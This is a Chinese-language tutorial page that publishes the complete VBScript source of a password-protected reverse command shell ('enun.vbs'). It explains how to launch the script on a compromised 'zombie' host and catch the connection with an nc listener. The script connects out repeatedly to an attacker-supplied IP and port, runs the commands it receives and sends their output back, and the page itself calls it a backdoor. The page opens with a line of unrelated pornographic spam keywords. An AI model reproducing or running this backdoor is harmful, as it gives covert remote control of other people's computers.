欧美bbbwbbbw肥妇,免费乱码人妻系列日韩,一级黄片

VBScript 打造自己的遠(yuǎn)程CMDShell附使用教程

 更新時(shí)間:2013年07月28日 19:35:08   作者:  
這個(gè)cmdshell需要結(jié)合nc進(jìn)行配合使用,現(xiàn)在肉雞上執(zhí)行cmdshell然后在本地上面運(yùn)行nc,注意看下面的參數(shù)
請(qǐng)先下載 mswinsck.ocx 與 VB6Controls.reg!

使用方法:

1,控制:nc.exe,執(zhí)行:nc -l -v -p 1234;



2,目標(biāo):cscript.exe enun.vbs IP Port;



3,密碼:enun。

幾點(diǎn)說(shuō)明:
1,退出 SHELL,請(qǐng)輸入 “exit”,不要用 “Ctrl + C”,這樣的話(huà)只能等目標(biāo)重啟或手動(dòng)運(yùn)行后門(mén)才能連接;
2,Windows 7 等環(huán)境下普通標(biāo)準(zhǔn)用戶(hù)也能使用,但是獲取的權(quán)限相對(duì)有限。
3,內(nèi)部命令及管道使用如下圖:



相關(guān)下載:
      1,視頻演示
      2,vb6controls

enun.vbs 源碼:

復(fù)制代碼 代碼如下:

'--------------------------------------------------------------------------
' Copyright (c) lxzzr. All rights reserved.
' ScriptName: enun.vbs
' Creation Date: 28/8/2012
' Last Modified: 28/8/2012
' Author: lxzzr, www.enun.net
' E-mail: lxzzr@21cn.com
' Usage: Cscript.exe //nologo enun.vbs IP Port
'--------------------------------------------------------------------------
On Error Resume Next
Public SocketObj, ExecObj, ShellObj
RemoteHost = Wscript.Arguments(0)
RemotePort = Wscript.Arguments(1)

Do
 Do While (SocketObj.State <> 7)
  WScript.Echo "Try Connect to " & RemoteHost & ":" & RemotePort & " ..."

  Set SocketObj = WScript.CreateObject("MSWinsock.Winsock")
  SocketObj.Protocol = 0
  SocketObj.RemoteHost = RemoteHost
  SocketObj.RemotePort = RemotePort
  SocketObj.Connect

  WScript.Sleep 3000
 Loop

 WScript.Echo "Connected to server."
 SocketObj.SendData SocketObj.LocalHostName & " is Connected, Enter Password: "
 Do While (SocketObj.BytesReceived = 0)
  WScript.Sleep 10
 Loop

 '密碼驗(yàn)證
 SocketObj.GetData Authkey, vbString
 If Split(Authkey, chr(10), -1, 1)(0) = "enun" Then

  Set ShellObj = CreateObject("WScript.Shell")
  sRevData = " "
  SocketObj.SendData "Logon Success, Welcome!" & chr(13) & chr(10)

  '循環(huán)等待執(zhí)行命令
  Do
   Set ExecObj = ShellObj.Exec(Split(sRevData, chr(10), -1, 1)(0))

   SocketObj.SendData ExecObj.StdOut.ReadAll
   SocketObj.SendData ExecObj.StdErr.ReadAll

   If sRevData <> "" Then
    SocketObj.SendData chr(10) & "[" & SocketObj.LocalHostName & "@" & "enun]#: "
   End If

   If Left(sRevData, 4) = "exit" Then
    SocketObj.Close
    Exit Do
   End If

   SocketObj.GetData sRevData, vbString
   WScript.Sleep 1000
  Loop
 Else
  LockoutBadCount = LockoutBadCount + 1
  SocketObj.SendData "Logon Failure: Unknown user name or bad password." & chr(13) & chr(10)
  WScript.Sleep 1000
 End If

 '賬戶(hù)策略
 If (LockoutBadCount > 3) Then
  SocketObj.SendData "The User Account is locked!" & chr(13) & chr(10)
  WScript.Sleep 1000
  SocketObj.Close
  LockoutBadCount = 0
  WScript.Sleep 600*1000
 End If
Loop

相關(guān)文章

最新評(píng)論